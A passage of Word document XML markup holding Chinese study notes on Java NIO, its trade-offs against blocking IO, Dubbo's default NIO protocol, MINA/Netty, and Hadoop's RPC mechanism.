          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有更高的性能，但是对于开发来的，难度就成数倍递增了。由于是有多少数据就读取多少数据，这样在读取完整之前需要将已经读取到的数据保存起来，而且需要与其他地方来的数据隔离开来不能混在一起，否则就不知道这数据是谁的了，呵呵。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65602" w:rsidRPr="0004620E" w:rsidRDefault="00695EBC" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00052241" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2) nio</w:t>
      </w:r>
      <w:r w:rsidR="00052241" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>优势与缺点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052241" w:rsidRPr="0004620E" w:rsidRDefault="00052241" w:rsidP="00052241">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>高并发</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成千上万个连接</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，数据量较小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052241" w:rsidRPr="0004620E" w:rsidRDefault="00052241" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="007F671B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果少量连接使用非常高的带宽，一次发送大量的数据，典型</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器比较适合</w:t>
      </w:r>
      <w:r w:rsidR="00641236" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，一个连接通过一个线程处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA1685" w:rsidRPr="0004620E" w:rsidRDefault="00861A71" w:rsidP="001C3A06">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺省协议采用单一长连接和</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>异步通讯</w:t>
      </w:r>
      <w:r w:rsidR="00B83BE4" w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，适合于小数据量大并发的服务调用，以及服务消费者数量远远大于服务提供者机器数的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83BE4" w:rsidRPr="00F41A4C" w:rsidRDefault="00B83BE4" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B83BE4" w:rsidRPr="00F41A4C" w:rsidRDefault="00B83BE4" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="0004620E" w:rsidRDefault="00D96A23" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MINA</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NETTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A548F" w:rsidRPr="0004620E" w:rsidRDefault="002A548F" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最近在分析</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hadoop</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">RPC(Remote Procedure Call Protocol </w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，远程过程调用协议，它是一种通过网络从远程计算机程序上请求服务，而不需要了解底层网络技术的协议。可以参考：</w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="0004620E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="620091"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://baike.baidu.com/view/32726.htm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）机制时，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hadoop</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>机制的实现主要用到了两个技术：动态代理（动态代理可以参考博客：</w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="0004620E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="620091"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://weixiaolu.iteye.com/blog/1477774</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。为了能够正确地分析</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hadoop</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>源码，我觉得很有必要先研究一下</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的原理和具体实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D82171" w:rsidRPr="0004620E" w:rsidRDefault="00D82171" w:rsidP="00CE4C2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004620E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NIO:New IO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>我用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JAVA NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，一般常用的高并发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>框架，也是用的这个做扩展。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>jdk1.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>开始使用的，它既可以说成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>I/O”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，也可以说成非阻塞式</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。下面是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的工作原理：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>由一个专门的线程来处理所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>事件，并负责分发。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>事件驱动机制：事件到的时候触发，而不是同步的去监视事件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>线程通讯：线程之间通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
